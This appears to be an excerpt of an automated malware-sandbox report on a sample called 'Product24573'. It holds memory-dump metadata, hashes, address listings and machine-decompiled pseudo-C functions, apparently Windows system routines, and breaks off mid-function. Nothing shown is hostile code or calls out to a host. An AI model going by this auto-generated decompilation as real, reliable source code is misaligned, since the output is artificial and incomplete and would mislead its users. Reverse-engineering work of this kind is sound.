                                          0x00000000
                                          0x0118bb06
                                          0x0118b9d7
                                          0x0118b9db
                                          0x0118b9db
                                          0x0118b9de
                                          0x0118b9de
                                          0x0118b9e4
                                          0x0118b9e7
                                          0x0118b9ea
                                          0x0118b9ec
                                          0x0118b9ef
                                          0x0118b9f3
                                          0x0118ba1b
                                          0x0118ba1b
                                          0x0118ba23
                                          0x0118ba24
                                          0x0118ba27
                                          0x0118ba2a
                                          0x0118ba2b
                                          0x0118ba2e
                                          0x0118ba30
                                          0x0118ba37
                                          0x0118ba3f
                                          0x0118ba9c
                                          0x0118baa2
                                          0x0118bb13
                                          0x0118bb15
                                          0x0118baae
                                          0x0118baae
                                          0x0118bab3
                                          0x0118bab5
                                          0x0118baba
                                          0x0118bac8
                                          0x0118bac8
                                          0x0118baba
                                          0x0118bacd
                                          0x0118bacf
                                          0x00000000
                                          0x0118bacf
                                          0x0118bb1a
                                          0x00000000
                                          0x0118bb1c
                                          0x0118baa7
                                          0x0118bb11
                                          0x00000000
                                          0x0118bb11
                                          0x0118baa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0118ba41
                                          0x0118ba41
                                          0x0118ba41
                                          0x0118ba58
                                          0x0118ba5d
                                          0x0118ba62
                                          0x00000000
                                          0x00000000
                                          0x0118ba64
                                          0x0118ba67
                                          0x0118ba68
                                          0x0118ba69
                                          0x0118ba6c
                                          0x0118ba6f
                                          0x0118ba71
                                          0x0118ba78
                                          0x0118ba80
                                          0x00000000
                                          0x00000000
                                          0x0118ba90
                                          0x0118ba90
                                          0x0118ba97
                                          0x00000000
                                          0x0118ba97
                                          0x0118b9f5
                                          0x0118b9f7
                                          0x0118b9f7
                                          0x0118b9fa
                                          0x0118ba03
                                          0x0118ba07
                                          0x0118ba0c
                                          0x0118ba10
                                          0x0118ba17
                                          0x00000000
                                          0x0118b9f7
                                          0x0118b9a6
                                          0x0118b9a8
                                          0x0118b9af
                                          0x0118b9b3
                                          0x00000000
                                          0x00000000
                                          0x0118b9b9
                                          0x00000000
                                          0x0118b9b9
                                          0x0118b94d
                                          0x0118b98f
                                          0x0118b995
                                          0x0118b999
                                          0x0118b960
                                          0x0118b967
                                          0x0118b968
                                          0x0118b96a
                                          0x00000000
                                          0x0118b96a
                                          0x0118b99b
                                          0x0118b99e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0118b99e
                                          0x0118b951
                                          0x0118b954
                                          0x0118b95a
                                          0x0118b95e
                                          0x0118b972
                                          0x0118b979
                                          0x0118b97d
                                          0x0118b97f
                                          0x0118b980
                                          0x0118b982
                                          0x0118b984
                                          0x00000000
                                          0x0118b984
                                          0x00000000
                                          0x0118b926
                                          0x00000000
                                          0x0118b926

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 98e3a4ecf6384019ef787b564bedcf225f7b248d0c7a939d080393abdadd2bcf
                                          • Instruction ID: 93fbb6ca9ebef9a47edd1c881db8e0954fdb3c44675fe99785cb1e844603505e
                                          • Opcode Fuzzy Hash: 98e3a4ecf6384019ef787b564bedcf225f7b248d0c7a939d080393abdadd2bcf
                                          • Instruction Fuzzy Hash: F9713072204B06EFE73AEF18C844F66BBE5EB40724F158528E6558B2E0EB71E941CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01176DC9 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E01176DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01176B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01117D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01139AE0();
					_t87 = L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0117795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0117795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0117795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0117795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01114620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01176B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01176B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01176B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01176B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01117D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01139AE0();
								L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01112400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01112400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01112400( &_v52);
							}
							if(_v28 >= 0) {
								return L01112400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                          0x01176dd4
                                          0x01176dde
                                          0x01176de1
                                          0x01176de3
                                          0x01176de6
                                          0x01176de9
                                          0x01176dec
                                          0x01176def
                                          0x01176df2
                                          0x01176df5
                                          0x01176dfe
                                          0x01176e04
                                          0x01176e09
                                          0x01176e0d
                                          0x01176e18
                                          0x01176e1b
                                          0x01176e22
                                          0x01176e2d
                                          0x01176e30
                                          0x01176e36
                                          0x01176e42
                                          0x01176e4d
                                          0x01176e50
                                          0x01176e55
                                          0x01176e5c
                                          0x01176e6e
                                          0x01176e5e
                                          0x01176e67
                                          0x01176e67
                                          0x01176e73
                                          0x01176e74
                                          0x01176e77
                                          0x01176e7c
                                          0x01176e7d
                                          0x01176e8e
                                          0x01176e93
                                          0x01176e9c
                                          0x01176ea8
                                          0x01176eab
                                          0x01176eac
                                          0x01176eb3
                                          0x01176ecd
                                          0x01176edc
                                          0x01176ee2
                                          0x01176ee5
                                          0x01176ef2
                                          0x01176efb
                                          0x01176f01
                                          0x01176f06
                                          0x01176f0b
                                          0x01176f11
                                          0x01176f1a
                                          0x01176f22
                                          0x01176f26
                                          0x01176f26
                                          0x01176f33
                                          0x01176f41
                                          0x01176f44
                                          0x01176f47
                                          0x01176f54
                                          0x01176f65
                                          0x01176f77
                                          0x01176f7c
                                          0x01176f82
                                          0x01176f91
                                          0x01176f99
                                          0x01176fa3
                                          0x01176fae
                                          0x01176fae
                                          0x01176fba
                                          0x01176fbb
                                          0x01176fbc
                                          0x01176fc1
                                          0x01176fc2
                                          0x01176fd3
                                          0x01176fd8
                                          0x01176fd8
                                          0x01176fdf
                                          0x01176fe8
                                          0x01176fee
                                          0x01176fee
                                          0x01176ff5
                                          0x01176ffb
                                          0x01176ffb
                                          0x01177004
                                          0x00000000
                                          0x0117700a
                                          0x01177004
                                          0x01176eb3
                                          0x01176e9c
                                          0x01177015

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: d04e6f0db657eecec56dee2babc7baddb2b5dfbe8f00f36956a45147c303ded1
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: 2A717C71A0061AEFDB15DFA8C984AEEFBB9FF48714F104469E504A7390DB34AA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F52A5 Relevance: .2, Instructions: 161COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E010F52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0110EEF0(0x11e79a0);
					_t104 =  *0x11e8210; // 0xca2c30
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0110EB70(_t93, 0x11e79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01139890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0110EEF0(0x11e79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0110EB70(0, 0x11e79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xca2c3d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0112F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0110EEF0(0x11e79a0);
									__eflags =  *0x11e8210 - _t104; // 0xca2c30
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x11e8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01174888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0110EB70(_t95, 0x11e79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E011395D0();
											L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E011395D0();
											L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0110EB70(_t93, 0x11e79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E011395D0();
										L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E011395D0();
										L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0112F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                          0x010f52a5
                                          0x010f52ad
                                          0x010f52b0
                                          0x010f52b3
                                          0x010f52b7
                                          0x010f52ba
                                          0x010f52bf
                                          0x010f52c4
                                          0x010f52cc
                                          0x00000000
                                          0x00000000
                                          0x010f52ce
                                          0x010f52d9
                                          0x010f52dd
                                          0x010f52e7
                                          0x010f52f7
                                          0x010f52f9
                                          0x010f52fd
                                          0x01150dcf
                                          0x01150dd5
                                          0x01150dd6
                                          0x01150dd7
                                          0x01150dd8
                                          0x01150dd9
                                          0x01150dde
                                          0x01150ddf
                                          0x01150de0
                                          0x01150de1
                                          0x01150de2
                                          0x01150de5
                                          0x01150dea
                                          0x01150dec
                                          0x01150f60
                                          0x01150f64
                                          0x01150f70
                                          0x01150f76
                                          0x01150f79
                                          0x01150f79
                                          0x00000000
                                          0x01150f64
                                          0x01150df2
                                          0x01150df7
                                          0x01150e04
                                          0x01150e0d
                                          0x01150e0d
                                          0x01150e10
                                          0x01150e1a
                                          0x01150e1c
                                          0x01150e4c
                                          0x01150e52
                                          0x01150e61
                                          0x01150e67
                                          0x01150e6b
                                          0x01150e70
                                          0x01150e76
                                          0x01150ed7
                                          0x01150edc
                                          0x01150ee0
                                          0x01150ee6
                                          0x01150eea
                                          0x01150eed
                                          0x01150ef0
                                          0x01150ef3
                                          0x01150ef6
                                          0x01150ef9
                                          0x01150efe
                                          0x01150f01
                                          0x01150f01
                                          0x01150f0b
                                          0x01150f12
                                          0x01150f16
                                          0x01150f18
                                          0x01150f1b
                                          0x01150f2c
                                          0x01150f31
                                          0x01150f31
                                          0x01150f35
                                          0x01150f39
                                          0x01150f3a
                                          0x01150f3c
                                          0x01150f3f
                                          0x01150f50
                                          0x01150f55
                                          0x01150f55
                                          0x01150f59
                                          0x010f52eb
                                          0x010f52f1
                                          0x010f52f1
                                          0x01150e7d
                                          0x01150e84
                                          0x01150e88
                                          0x01150e8a
                                          0x01150e8d
                                          0x01150e9e
                                          0x01150ea3
                                          0x01150ea3
                                          0x01150ea7
                                          0x01150eaf
                                          0x01150eb3
                                          0x01150eb9
                                          0x01150eb9
                                          0x01150ebc
                                          0x01150ecd
                                          0x01150ecd
                                          0x00000000
                                          0x01150eb3
                                          0x01150e21
                                          0x01150e2b
                                          0x01150e2f
                                          0x01150e30
                                          0x01150e3a
                                          0x01150e3f
                                          0x01150e41
                                          0x00000000
                                          0x00000000
                                          0x01150e47
                                          0x00000000
                                          0x01150e47
                                          0x01150df9
                                          0x01150dfe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01150dfe
                                          0x010f5303
                                          0x010f5307
                                          0x00000000
                                          0x010f5309
                                          0x00000000
                                          0x010f5309
                                          0x010f5307
                                          0x010f52e9
                                          0x010f52e9
                                          0x00000000
                                          0x010f52e9
                                          0x010f530e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a1b752004d3bc588a3ea268158ae000802aabfad3c32147d054e5b4aa94d3e2
                                          • Instruction ID: d8f85aeae122088f24c5770a375a85ed9947f43c18bc96186016a6b648508bbc
                                          • Opcode Fuzzy Hash: 3a1b752004d3bc588a3ea268158ae000802aabfad3c32147d054e5b4aa94d3e2
                                          • Instruction Fuzzy Hash: 6A51F131105742DBD72AEFA8C845B1BBBE4FF94714F14091EF5A587A91E7B0E840C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01122AE4 Relevance: .2, Instructions: 159COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01122AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x11e8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x11e8208; // 0x11e8207
				_t8 = _t57 + 0x11e8208; // 0x11e8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x11e8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x11e821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x11e6d5c; // 0x7f3a0654
							_t72 =  *0x11e6d5c; // 0x7f3a0654
							_t75 =  *0x11e6d5c; // 0x7f3a0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x11e6d5c; // 0x7f3a0654
							_t84 =  *0x11e6d5c; // 0x7f3a0654
							_t87 =  *0x11e6d5c; // 0x7f3a0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0113F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                          0x01122ae4
                                          0x01122aec
                                          0x01122aef
                                          0x01122af4
                                          0x01122af7
                                          0x01122afd
                                          0x01122b92
                                          0x01122b92
                                          0x01122b97
                                          0x01122b9c
                                          0x01122b9c
                                          0x01122b03
                                          0x01122b06
                                          0x01122b09
                                          0x01122b09
                                          0x01122b0f
                                          0x01122b15
                                          0x01122b15
                                          0x01122b1b
                                          0x01122b1e
                                          0x01122b21
                                          0x01122b26
                                          0x01122b29
                                          0x01122b81
                                          0x01122b84
                                          0x01122c0e
                                          0x01122c15
                                          0x01122c24
                                          0x01122c24
                                          0x01122b8a
                                          0x01122b8a
                                          0x01122b8a
                                          0x01122b8a
                                          0x01122b90
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01122b4a
                                          0x01122b4a
                                          0x01122b4d
                                          0x01122b53
                                          0x00000000
                                          0x00000000
                                          0x01122b55
                                          0x01122b58
                                          0x01122bb7
                                          0x01165d1b
                                          0x01165d37
                                          0x01165d47
                                          0x01165d53
                                          0x01122bbd
                                          0x01122bbd
                                          0x01122bbd
                                          0x01122bb7
                                          0x01122b5d
                                          0x01122c2f
                                          0x01165d5b
                                          0x01165d77
                                          0x01165d87
                                          0x01165d93
                                          0x01122c35
                                          0x01122c35
                                          0x01122c35
                                          0x01122c2f
                                          0x01122b65
                                          0x01122b9f
                                          0x01122ba2
                                          0x01122b67
                                          0x01122b67
                                          0x01122b69
                                          0x01122b6b
                                          0x01122b6e
                                          0x01122bc9
                                          0x01122bcc
                                          0x01122bcf
                                          0x01122bd4
                                          0x01122bd6
                                          0x01122bd6
                                          0x01122bdb
                                          0x01122c02
                                          0x01122c05
                                          0x01122c07
                                          0x00000000
                                          0x01122c07
                                          0x01122be0
                                          0x01122c00
                                          0x01122c3f
                                          0x01122c3f
                                          0x00000000
                                          0x01122c00
                                          0x01122be5
                                          0x01122be7
                                          0x01122bec
                                          0x01122bf4
                                          0x01122bf6
                                          0x00000000
                                          0x01122bf6
                                          0x01122b70
                                          0x01122b76
                                          0x01122b2b
                                          0x01122b2b
                                          0x01122b2d
                                          0x01122b2f
                                          0x01122b32
                                          0x01122b35
                                          0x01122b3a
                                          0x00000000
                                          0x01122b40
                                          0x01122b43
                                          0x01122b45
                                          0x01122b47
                                          0x01122b4a
                                          0x01122b4d
                                          0x01122b53
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01122b53
                                          0x01122b78
                                          0x01122b78
                                          0x01122b7b
                                          0x01122b7e
                                          0x00000000
                                          0x01122b7e
                                          0x01122b76
                                          0x01122ba5
                                          0x01122ba5
                                          0x01122ba8
                                          0x01122bad
                                          0x00000000
                                          0x00000000
                                          0x01122baf
                                          0x01122baf
                                          0x01122bc2
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b6383b652a320abb9cddf13546d097ea6bf45c7989e1e37594bf5a62b15dbd71
                                          • Instruction ID: 6e50a0f7f2ca2ae362e470b94790f2f5ee6defa683cbc99c07a331a1861f95ed
                                          • Opcode Fuzzy Hash: b6383b652a320abb9cddf13546d097ea6bf45c7989e1e37594bf5a62b15dbd71
                                          • Instruction Fuzzy Hash: 8D51E376B00125CFCB2CCF5CC8909BDB7F1FB89700716845AE856AB365D734AAA1CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011BAE44 Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E011BAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E011BC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E011BACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E011BFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
